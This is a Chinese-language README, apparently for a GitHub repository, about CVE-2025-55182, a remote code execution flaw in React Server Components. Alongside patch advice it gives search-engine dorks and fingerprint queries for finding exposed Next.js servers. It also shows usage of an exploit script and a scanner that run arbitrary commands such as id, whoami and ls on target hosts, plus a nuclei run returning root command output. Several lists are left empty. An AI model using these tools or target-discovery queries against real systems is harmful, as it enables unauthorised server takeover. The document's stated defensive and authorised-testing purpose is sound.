CVE-2025-55182 是一个严重的远程代码执行 (RCE) 漏洞,影响多个包中的 React Server Components (RSC) 实现,包括:
该漏洞源于 RSC 使用的内部 Flight 协议对负载进行不安全反序列化。当某些不受信任的输入通过 HTTP 请求流经 React Server Components 时,可能触发服务器端代码执行。
受影响版本包括:
补丁版本包括:
React Server Components 接受客户端请求,这些请求在后端被解析和反序列化。该漏洞源于对入站数据反序列化控制不足,使得精心构造的负载可被解释为可执行的服务器端组件。
当这种情况发生时,服务器上可能发生任意 JavaScript 执行,根据托管环境和权限,可能导致服务器完全沦陷。
如果被利用,攻击者可能能够:
CVSS 分数: 10.0 – 严重
验证应用是否暴露了 React Server Components 以及是否使用了受影响版本。
curl -I https://target.com/?__rsc=1
这些关键词有助于识别面向公开的仓库或 Web 应用是否引用了 RSC 组件。
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
仅供内部审计组织自身域名使用。
检查暴露的框架使用情况,而非漏洞利用。
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
为了对您自己的基础设施进行自动化防御扫描,请克隆基于模板的检测逻辑:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)功能完备的 RCE 利用脚本,可执行任意命令并获取输出。
用法:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - 目标域名/URL(必需)-c, --command - 要执行的命令(默认:id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
仓库内的模板旨在用于:
重要提示:这些模板仅能在您拥有或获得授权评估的系统上执行。
本仓库中包含的 Nuclei 模板仅用于:
请确保:
升级到以下补丁版本之一:
安全研究员 • 网络安全培训师 • 漏洞赏金猎人
座右铭: 零信任全面安全 🚀
CVE-2025-55182 是目前对 React 基础设施最严重的威胁之一。由于利用向量的简单性以及未认证的攻击面,强烈建议立即修补。任何运行受影响 RSC 版本的组织应考虑紧急优先处理。
本仓库及文档仅供防御性研究以及您拥有资产的安防验证。任何滥用可能导致非法。您有责任遵守法律和组织政策。
由 Cyber Leelawat 用心制作 ❤️
零信任全面安全 🎯🔐